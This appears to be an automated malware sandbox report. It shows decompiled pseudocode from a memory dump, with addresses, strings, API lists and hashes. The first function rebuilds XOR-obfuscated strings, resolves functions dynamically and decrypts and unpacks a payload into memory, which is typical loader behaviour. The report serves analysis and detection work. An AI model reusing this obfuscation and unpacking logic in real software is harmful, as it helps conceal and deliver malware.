				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				char _v332;
				char _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				char _v364;
				char _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				char _v396;
				char _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				char _v428;
				char _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				char _v460;
				char _v464;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t229;
				intOrPtr _t233;
				char* _t235;
				signed int _t237;
				intOrPtr _t239;
				intOrPtr* _t241;
				char* _t243;
				char _t244;
				char* _t247;
				intOrPtr _t258;
				intOrPtr _t259;
				char _t260;
				intOrPtr* _t289;
				signed int _t290;
				void* _t291;
				intOrPtr _t307;
				signed int _t308;
				void* _t312;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				intOrPtr* _t333;
				intOrPtr* _t334;
				char* _t335;
				signed int _t336;
				void* _t337;
				signed int _t369;

				_t229 =  *0x73231004; // 0xa57badb2
				_v8 = _t229 ^ _t336;
				_v272 = 0;
				_v268 = 0x6eac9bba;
				_v264 = 0x6fb6a88d;
				_v260 = 0x7ba7808c;
				_v256 = 0x6abb86ba;
				_v252 = 0x5fa1919c;
				_v248 = 0x1ed5e9f9;
				_t333 = __ecx;
				if(_v272 == 0) {
					_t326 = 0;
					do {
						 *(_t336 + _t326 * 4 - 0x108) =  *(_t336 + _t326 * 4 - 0x108) ^ 0x1ed5e9f9;
						_t326 = _t326 + 1;
					} while (_t326 < 6);
				}
				_v304 = 0;
				_v300 = 0x1401ab1e;
				_v296 = 0x1404ab29;
				_v292 = 0x140cab2f;
				_v288 = 0x1457ab6c;
				_v284 = 0x1401ab71;
				_v280 = 0x1409ab33;
				_v276 = 0x1465ab5f;
				if(_v304 == 0) {
					_t325 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t336 + _t325 * 4 - 0x128) =  *(_t336 + _t325 * 4 - 0x128) ^ 0x1465ab5f;
						_t325 = _t325 + 1;
					} while (_t325 < 7);
				}
				_t233 = E73211FB0( &_v300,  &_v268);
				_v156 = 0;
				_v152 = 0x54f0df29;
				_v148 = 0x54e4e41e;
				_v144 = 0x6ffddf05;
				_v140 = 0x2489d40f;
				_v124 = _t233;
				if(_v156 == 0) {
					_t324 = 0;
					do {
						 *(_t336 + _t324 * 4 - 0x94) =  *(_t336 + _t324 * 4 - 0x94) ^ 0x2489ad6a;
						_t324 = _t324 + 1;
					} while (_t324 < 4);
				}
				_v336 = 0;
				_v332 = 0x6d97da2e;
				_v328 = 0x6d92da19;
				_v324 = 0x6d9ada1f;
				_v320 = 0x6dc1da5c;
				_v316 = 0x6d97da41;
				_v312 = 0x6d9fda03;
				_v308 = 0x6df3da6f;
				if(_v336 == 0) {
					_t323 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t336 + _t323 * 4 - 0x148) =  *(_t336 + _t323 * 4 - 0x148) ^ 0x6df3da6f;
						_t323 = _t323 + 1;
					} while (_t323 < 7);
				}
				_t235 = E73211FB0( &_v332,  &_v152);
				_v176 = 0;
				_v172 = 0x5dfbf431;
				_v168 = 0x4ee7c206;
				_v164 = 0x59f2ff00;
				_v160 = 0x2d828672;
				_v128 = _t235;
				if(_v176 == 0) {
					_t322 = 0;
					do {
						 *(_t336 + _t322 * 4 - 0xa8) =  *(_t336 + _t322 * 4 - 0xa8) ^ 0x2d828672;
						_t322 = _t322 + 1;
					} while (_t322 < 4);
				}
				_v368 = 0;
				_v364 = 0x4abc0a66;
				_v360 = 0x4ab90a51;
				_v356 = 0x4ab10a57;
				_v352 = 0x4aea0a14;
				_v348 = 0x4abc0a09;
				_v344 = 0x4ab40a4b;
				_v340 = 0x4ad80a27;
				if(_v368 == 0) {
					_t321 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t336 + _t321 * 4 - 0x168) =  *(_t336 + _t321 * 4 - 0x168) ^ 0x4ad80a27;
						_t321 = _t321 + 1;
					} while (_t321 < 7);
				}
				_t237 = E73211FB0( &_v364,  &_v172);
				_v220 = 0;
				_v216 = 0x1ddbd4ba;
				_v212 = 0x19c7f58d;
				_v208 = 0x3ddbc3b2;
				_v204 = 0xc3d498;
				_v200 = 0x6da2a6f9;
				_v136 = _t237;
				if(_v220 == 0) {
					_t320 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t336 + _t320 * 4 - 0xd4) =  *(_t336 + _t320 * 4 - 0xd4) ^ 0x6da2a6f9;
						_t320 = _t320 + 1;
					} while (_t320 < 5);
				}
				_v400 = 0;
				_v396 = 0x542ca61e;
				_v392 = 0x5409a629;
				_v388 = 0x5421a62f;
				_v384 = 0x547aa66c;
				_v380 = 0x542ca671;
				_v376 = 0x5424a633;
				_v372 = 0x5448a65f;
				if(_v400 == 0) {
					_t319 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t336 + _t319 * 4 - 0x188) =  *(_t336 + _t319 * 4 - 0x188) ^ 0x5448a65f;
						_t319 = _t319 + 1;
					} while (_t319 < 7);
				}
				_t239 = E73211FB0( &_v396,  &_v216);
				_v244 = 0;
				_v240 = 0x4460ae52;
				_v236 = 0x587c8e65;
				_v232 = 0x516abd74;
				_v228 = 0x4077b352;
				_v224 = 0x346da474;
				_v132 = _t239;
				if(_v244 == 0) {
					_t318 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t336 + _t318 * 4 - 0xec) =  *(_t336 + _t318 * 4 - 0xec) ^ 0x3419dc11;
						_t318 = _t318 + 1;
					} while (_t318 < 5);
				}
				_v432 = 0;
				_v428 = 0x51e42531;
				_v424 = 0x51e12506;
				_v420 = 0x51e92500;
				_v416 = 0x51b22543;
				_v412 = 0x51e4255e;
				_v408 = 0x51ec251c;
				_v404 = 0x51802570;
				if(_v432 == 0) {
					_t317 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t336 + _t317 * 4 - 0x1a8) =  *(_t336 + _t317 * 4 - 0x1a8) ^ 0x51802570;
						_t317 = _t317 + 1;
					} while (_t317 < 7);
				}
				_t241 = E73211FB0( &_v428,  &_v240);
				_v196 = 0;
				_t289 = _t241;
				_v192 = 0x1e1335eb;
				_v188 = 0x1d0f03dc;
				_v184 = 0x170535dc;
				_v180 = 0x6e1322e3;
				if(_v196 == 0) {
					_t316 = 0;
					do {
						 *(_t336 + _t316 * 4 - 0xbc) =  *(_t336 + _t316 * 4 - 0xbc) ^ 0x6e6a47a8;
						_t316 = _t316 + 1;
					} while (_t316 < 4);
				}
				_v464 = 0;
				_v460 = 0xddae059;
				_v456 = 0xddfe06e;
				_v452 = 0xdd7e068;
				_v448 = 0xd8ce02b;
				_v444 = 0xddae036;
				_v440 = 0xdd2e074;
				_v436 = 0xdbee018;
				if(_v464 == 0) {
					_t315 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t336 + _t315 * 4 - 0x1c8) =  *(_t336 + _t315 * 4 - 0x1c8) ^ 0x0dbee018;
						_t315 = _t315 + 1;
					} while (_t315 < 7);
				}
				_t332 =  &_v192;
				_t243 = E73211FB0( &_v460,  &_v192);
				asm("movups xmm1, [0x73221cbc]");
				_push(0xf0000000);
				asm("movups xmm2, [0x73221ccc]");
				_push(0x18);
				asm("movups xmm0, [0x73221ce0]");
				_t335 = _t243;
				_v76 = 0xa300;
				_t244 =  *0x73221cf0; // 0x0
				_push(0);
				_v12 = _t244;
				_push(0);
				_push( &_v72);
				asm("movups [ebp-0x18], xmm0");
				_v120 = 0x208;
				_v116 = 0x6610;
				_v112 = 0x20;
				asm("movups [ebp-0x68], xmm1");
				_v72 = 0;
				asm("movups [ebp-0x58], xmm2");
				_v68 = 0;
				if(_v124() == 0) {
					L57:
					_t247 = 0;
					goto L58;
				} else {
					_push( &_v68);
					_push(1);
					_push(0);
					_push(0x2c);
					_push( &_v120);
					_push(_v72);
					if(_v128() == 0) {
						goto L57;
					} else {
						_v132(_v68, 1,  &_v28, 0);
						_v136(_v68, 0, 1, 0, _t333,  &_v76);
						 *_t335(_v68);
						 *_t289(_v72, 0);
						_t247 = E73212290(0x15400);
						_t217 = _t333 + 0xa2fa; // 0xa2fa
						_t307 = _t217;
						_v128 = _t247;
						_v124 = _t307;
						_t335 = _t247;
						if(_t333 == _t307) {
							L58:
							return E73212813(_t247, _t289, _v8 ^ _t336, _t332, _t333, _t335);
						} else {
							_t258 = _t307;
							do {
								_t308 =  *_t333;
								_t334 = _t333 + 1;
								_t290 = _t308;
								_t369 = _t308;
								if(_t369 >= 0) {
									_t259 = 0;
									if(_t308 != 0) {
										if(_t290 < 0x10) {
											L51:
											_t291 = _t290 - _t259;
											do {
												 *_t335 =  *_t334;
												_t335 = _t335 + 1;
												_t291 = _t291 - 1;
											} while (_t291 != 0);
										} else {
											_t332 =  *_t334;
											_t220 = _t335 - 1; // -1
											_t312 = _t220 + _t290;
											if(_t335 > _t334 || _t312 < _t334) {
												_t314 = _t290 & 0xfffffff0;
												_v136 = _t314;
												do {
													_t259 = _t259 + 0x10;
												} while (_t259 < _t314);
												_v132 = _t259;
												E73213750(_t334, _t335, _t332, _t314);
												_t335 = _t335 + _v136;
												_t337 = _t337 + 0xc;
												_t259 = _v132;
												if(_t259 < _t290) {
													goto L51;
												}
											} else {
												goto L51;
											}
										}
									}
									_t333 = _t334 + 1;
									goto L54;
								} else {
									_t290 =  ~_t290;
									if(_t369 != 0) {
										do {
											_t260 =  *_t334;
											_t334 = _t334 + 1;
											 *_t335 = _t260;
											_t335 = _t335 + 1;
											_t290 = _t290 - 1;
										} while (_t290 != 0);
										L54:
										_t258 = _v124;
									}
								}
							} while (_t333 != _t258);
							return E73212813(_v128, _t290, _v8 ^ _t336, _t332, _t333, _t335);
						}
					}
				}
			}

0x73211009
0x73211010
0x73211013
0x7321101a
0x73211024
0x7321102e
0x73211038
0x73211043
0x7321104d
0x73211066
0x73211068
0x7321106a
0x73211070
0x7321107c
0x73211083
0x73211084
0x73211070
0x73211089
0x73211090
0x7321109a
0x732110a4
0x732110ae
0x732110b8
0x732110c2
0x732110cc
0x732110e3
0x732110e5
0x732110e7
0x732110f0
0x732110fc
0x73211103
0x73211104
0x732110f0
0x73211115
0x7321111a
0x73211121
0x7321112b
0x73211135
0x7321113f
0x73211156
0x73211159
0x7321115b
0x73211160
0x7321116c
0x73211173
0x73211174
0x73211160
0x73211179
0x73211180
0x7321118a
0x73211194
0x7321119e
0x732111a8
0x732111b2
0x732111bc
0x732111d3
0x732111d5
0x732111d7
0x732111e0
0x732111ec
0x732111f3
0x732111f4
0x732111e0
0x73211205
0x7321120a
0x73211211
0x7321121b
0x73211225
0x7321122f
0x73211246
0x73211249
0x7321124b
0x73211250
0x7321125c
0x73211263
0x73211264
0x73211250
0x73211269
0x73211270
0x7321127a
0x73211284
0x7321128e
0x73211298
0x732112a2
0x732112ac
0x732112c3
0x732112c5
0x732112c7
0x732112d0
0x732112dc
0x732112e3
0x732112e4
0x732112d0
0x732112f5
0x732112fa
0x73211301
0x7321130b
0x73211315
0x7321131f
0x73211329
0x73211340
0x73211346
0x73211348
0x7321134a
0x73211350
0x7321135c
0x73211363
0x73211364
0x73211350
0x73211369
0x73211370
0x7321137a
0x73211384
0x7321138e
0x73211398
0x732113a2
0x732113ac
0x732113c3
0x732113c5
0x732113c7
0x732113d0
0x732113dc
0x732113e3
0x732113e4
0x732113d0
0x732113f5
0x732113fa
0x73211401
0x7321140b
0x73211415
0x7321141f
0x73211429
0x73211440
0x73211443
0x73211445
0x73211447
0x73211450
0x7321145c
0x73211463
0x73211464
0x73211450
0x73211469
0x73211470
0x7321147a
0x73211484
0x7321148e
0x73211498
0x732114a2
0x732114ac
0x732114c3
0x732114c5
0x732114c7
0x732114d0
0x732114dc
0x732114e3
0x732114e4
0x732114d0
0x732114f5
0x732114fa
0x73211501
0x73211503
0x7321150d
0x73211517
0x73211521
0x73211538
0x7321153a
0x73211540
0x7321154c
0x73211553
0x73211554
0x73211540
0x73211559
0x73211560
0x7321156a
0x73211574
0x7321157e
0x73211588
0x73211592
0x7321159c
0x732115b3
0x732115b5
0x732115b7
0x732115c0
0x732115cc
0x732115d3
0x732115d4
0x732115c0
0x732115d9
0x732115e5
0x732115ea
0x732115f1
0x732115f6
0x732115fd
0x732115ff
0x73211606
0x73211608
0x7321160f
0x73211614
0x73211616
0x7321161c
0x7321161e
0x7321161f
0x73211623
0x7321162a
0x73211631
0x73211638
0x7321163c
0x73211643
0x73211647
0x73211653
0x73211756
0x73211756
0x00000000
0x73211659
0x7321165c
0x7321165d
0x7321165f
0x73211661
0x73211666
0x73211667
0x7321166f
0x00000000
0x73211675
0x73211680
0x73211691
0x7321169a
0x732116a1
0x732116a8
0x732116ad
0x732116ad
0x732116b3
0x732116b6
0x732116b9
0x732116bd
0x73211758
0x73211768
0x732116c3
0x732116c3
0x732116c5
0x732116c5
0x732116c7
0x732116c8
0x732116cb
0x732116cd
0x732116e0
0x732116e4
0x732116e9
0x73211727
0x73211727
0x73211730
0x73211732
0x73211734
0x73211735
0x73211735
0x732116eb
0x732116eb
0x732116ed
0x732116f0
0x732116f4
0x732116fc
0x732116ff
0x73211705
0x73211705
0x73211708
0x7321170f
0x73211712
0x73211717
0x7321171d
0x73211720
0x73211725
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x732116f4
0x732116e9
0x7321173a
0x00000000
0x732116cf
0x732116cf
0x732116d1
0x732116d3
0x732116d3
0x732116d5
0x732116d6
0x732116d8
0x732116d9
0x732116d9
0x7321173b
0x7321173b
0x7321173b
0x732116d1
0x7321173e
0x73211755
0x73211755
0x732116bd
0x7321166f

Strings

, xrefs: 73211631
^%Q, xrefs: 73211498
1%Q, xrefs: 73211470
fqbuylgihaboukne, xrefs: 732115FF
ezcynadgiyeuydcbjuxknbjzygiggdnr, xrefs: 732115EA

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: $1%Q$^%Q$ezcynadgiyeuydcbjuxknbjzygiggdnr$fqbuylgihaboukne
API String ID: 0-456115436
Opcode ID: e6384a7a8d272d31fdae1e4e119cee12cc05e013103512a060609e15c2e38ede
Instruction ID: 0b619af8e306723ad6e8a2cf31781076a85b8fd1b7ee9de5289d123ee611a0a5
Opcode Fuzzy Hash: e6384a7a8d272d31fdae1e4e119cee12cc05e013103512a060609e15c2e38ede
Instruction Fuzzy Hash: EB128970E042AA8BEB24CF64D981BDDBBB5AF06304F1441EDD14E6B241EB719AD5CF41

Uniqueness

Uniqueness Score: -1.00%

Function 7321305D, Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E7321305D(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E73213178(_t34);
				 *_t60 = 0x2cc;
				_v632 = E73213750(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E73213750(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E73213178(_t49);
				}
				return _t49;
			}

0x7321305d
0x7321305d
0x7321305d
0x73213071
0x73213073
0x73213076
0x73213076
0x7321307a
0x7321307f
0x73213097
0x7321309d
0x732130a3
0x732130a9
0x732130af
0x732130b5
0x732130bb
0x732130c2
0x732130c9
0x732130d0
0x732130d7
0x732130de
0x732130e5
0x732130e6
0x732130ef
0x732130f5
0x732130f8
0x732130fe
0x7321310d
0x73213119
0x73213124
0x7321312b
0x73213132
0x7321313d
0x73213145
0x7321314e
0x73213150
0x73213153
0x73213155
0x7321315f
0x73213167
0x7321316d
0x00000000
0x73213174
0x73213177

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 73213069
IsDebuggerPresent.KERNEL32 ref: 73213135
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 73213155
UnhandledExceptionFilter.KERNEL32(?), ref: 7321315F

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: e0e5a9e0e3b4f2b36c1e9f172a39df81c896663814d5702c658d33f05da0ccce
Instruction ID: f807914f0e05d5de17a6420d8ff32266ebfa7706c93f5a6ba21920d760d272ba
Opcode Fuzzy Hash: e0e5a9e0e3b4f2b36c1e9f172a39df81c896663814d5702c658d33f05da0ccce
Instruction Fuzzy Hash: 16311A76D05319EBDB11DF64CA897CDBBF8AF04700F10409AE50DA7250EB715B859F44

Uniqueness

Uniqueness Score: -1.00%

Function 73215928, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E73215928(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x73231004; // 0xa57badb2
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E73213178(_t41);
					_pop(_t61);
				}
				E73213750(_t66,  &_v804, 0, 0x50);
				E73213750(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E73213178(_t57);
				}
				return E73212813(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x73215928
0x73215928
0x73215928
0x73215933
0x73215938
0x7321593a
0x73215942
0x73215944
0x73215947
0x7321594c
0x7321594c
0x73215958
0x7321596b
0x73215979
0x7321597f
0x73215985
0x7321598b
0x73215991
0x73215997
0x7321599d
0x732159a3
0x732159a9
0x732159af
0x732159b6
0x732159bd
0x732159c4
0x732159cb
0x732159d2
0x732159d9
0x732159da
0x732159e3
0x732159e9
0x732159ec
0x732159f2
0x732159ff
0x73215a08
0x73215a11
0x73215a1a
0x73215a28
0x73215a2a
0x73215a3f
0x73215a4b
0x73215a4e
0x73215a53
0x73215a62

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 73215A20
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 73215A2A
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 73215A37

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 7b916cd393291758641b99fce8fd8dbbee575aa18bc164648d6a5ee3001cc4f7
Instruction ID: 9f158f3e181629ffba86f8f0bf6a1a5d3ad747235c31d96c7c9abf2486eecca7
Opcode Fuzzy Hash: 7b916cd393291758641b99fce8fd8dbbee575aa18bc164648d6a5ee3001cc4f7
Instruction Fuzzy Hash: 3F31D77594131DABCB21DF68D988B9CBBF8BF08310F6041DAE50CA7250EB709B958F44

Uniqueness

Uniqueness Score: -1.00%

Function 7321473B, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E7321473B(int _a4) {
				void* _t14;

				if(E732158F5(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E732147C0(_t14, _a4);
				ExitProcess(_a4);
			}

0x73214748
0x73214764
0x73214764
0x7321476d
0x73214776

APIs

GetCurrentProcess.KERNEL32(?,?,7321473A,?,00000001,?,?), ref: 7321475D
TerminateProcess.KERNEL32(00000000,?,7321473A,?,00000001,?,?), ref: 73214764
ExitProcess.KERNEL32 ref: 73214776

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 02cd6999fc9c70d986413bd2e10026eb9ae4898a58774c4e67a4ff1f8c58d2ae
Instruction ID: 4e1b4362ec9cca67a0c1dd448a3f288c1e292631d85fa0202cc9770141e38618
Opcode Fuzzy Hash: 02cd6999fc9c70d986413bd2e10026eb9ae4898a58774c4e67a4ff1f8c58d2ae
Instruction Fuzzy Hash: 88E04F33000219EBDB127F65CB4CB183BB9FB46741B108414F40A86120DB75D993EA90

Uniqueness

Uniqueness Score: -1.00%

Function 7321BF43, Relevance: 1.8, APIs: 1, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E7321BF43(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E7321B96A(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
